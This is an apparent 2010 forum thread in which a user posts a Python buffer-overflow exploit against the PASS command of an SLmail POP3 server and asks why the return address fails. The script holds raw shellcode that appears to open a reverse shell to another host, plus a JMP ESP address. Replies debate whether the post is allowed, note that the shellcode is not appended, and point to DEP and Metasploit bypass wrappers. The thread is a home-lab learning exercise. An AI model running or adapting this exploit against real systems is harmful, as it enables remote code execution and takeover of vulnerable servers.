-
January 7th, 2010, 02:53 AM
#1
Junior Member
Please help
The target is an xp sp2 machine running a SLmail server which I know is vulnerable to buffer overflow with the PASS command. So I whipped up the following script:
#!/usr/bin/python
import struct
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
shellcode =("\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24" +
"\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f" +
"\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84" +
"\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28" +
"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c" +
"\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" +
"\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e" +
"\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" +
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50" +
"\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff" +
"\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43" +
"\x53\x43\x53\xff\xd0\x68\xc0\xa8\x02\x6c\x66\x68\x11\x5c" +
"\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff\xd6\x6a" +
"\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a\x50" +
"\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95" +
"\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab" +
"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51" +
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05" +
"\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6" +
"\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a" +
"\x04\x5f\x53\xff\xd6\xff\xd0")
# where 0x01c7a18b is a JMP ESP in user32.dll on xp sp2
# buffer = '\x41' * 4654 + struct.pack('<L', 0x01c7a18b) + '\x90' * 16 +shellcode
buffer = '\x41' * 4654 + '\x42' * 4 + '\x43' * 48
print "\nSending evil buffer..."
s.connect (('192.168.2.104',110))
data = s.recv(1024)
s.send('USER ftp' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
data = s.recv(1024)
s.close()
the resulting crash shows my four B's sitting pretty in EIP but when I pass the address of a JMP ESP in user32.dll (done in this case by changing the commented line) the resulting crash holds a different address in EIP which does not point towards my shellcode.
I am certain that some one will point out my stupid mistake easily but I have been working on this all day and still it does not work...
Thanks in advance for the help,
Ey3l45h
Last edited by ey3l45h; January 7th, 2010 at 04:17 PM.
Reason: I copied and pasted the wrong version of the script.
-
January 7th, 2010, 12:19 PM
#2
You are obviously going to get banned if you don't remove that. While I am sure you are not going to read this, anyways - http://antionline.com/faq.php?faq=vb...eading_posting
Parth Maniar,
CISSP, CISM, CISA, SSCP
*Thank you GOD*
Greater the Difficulty, SWEETER the Victory.
Believe in yourself.
-
January 7th, 2010, 01:42 PM
#3
If he's the owner of the machine he's attempting this on, there isn't any law being broken. Wasn't asked in the best manner, but, if the machine is his, there shouldn't be an issue. Other than others here probably not wanting to answer since we have a corporate owner who has to be responsible for any problems on here. The staff here are generally into the stuff we do here (I mean the staff, the mods obviously have an interest) but their bosses, probably not heh.
-
January 7th, 2010, 03:54 PM
#4
Junior Member
@byte~ I am sorry I did not see any where in the rules where it said that one could not post educational projects. Of course this is for practice on my home lab. If you could please link me to something which shows a rule I have broken I would be the first to remove my post. Thanks for the flaming.
@gore~ I recognize that I could have worded that better. I have been a long time reader of AO and this was my first post. If you have some advice which would help in the future maybe some other forums which would be able to help I would love to hear it.
The question still stands I still don't know why the address I am entering is destroying the stack in such a way that I can not get to my JMP ESP.
k thanx bye,
ey3l45h
-
January 8th, 2010, 01:08 AM
#5
-
January 8th, 2010, 01:29 AM
#6
I didn't see a problem with it so I left it alone too. He owns the machine and is simply trying to learn something, and isn't breaking any laws since, again, the machine is his, so he can do with it what he likes. So I just left it alone to grow lol.
-
January 9th, 2010, 07:16 PM
#7
actually once it crashed EIP held "00000000"
Its supposed to do that since its no longer held in memory. Without the process up and running there would be no need to store a memory address.
-
January 7th, 2010, 04:01 PM
#8
Doesn't even look like the shell is sent to anything at all. It just looks like an unused string in this script to me.
-
January 7th, 2010, 04:16 PM
#9
Junior Member
@~Spec You are right I was changing a few I am about to edit that... it did get sent in the script that I ran. I accidentally did not add it to the end of the commented line...
-
January 8th, 2010, 12:11 AM
#10
Not sure but can this be any service to you?
Data Execution Prevention (DEP) is a security feature included in modern Microsoft Windows operating systems that is intended to prevent an application or service from executing code from a non-executable memory region. This helps prevent certain exploits that store code via a buffer overflow, for example.
http://en.wikipedia.org/wiki/Data_Execution_Prevention
I believe metasploit has some wrappers to defeat this protection. Just convert script procedure to your code.
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|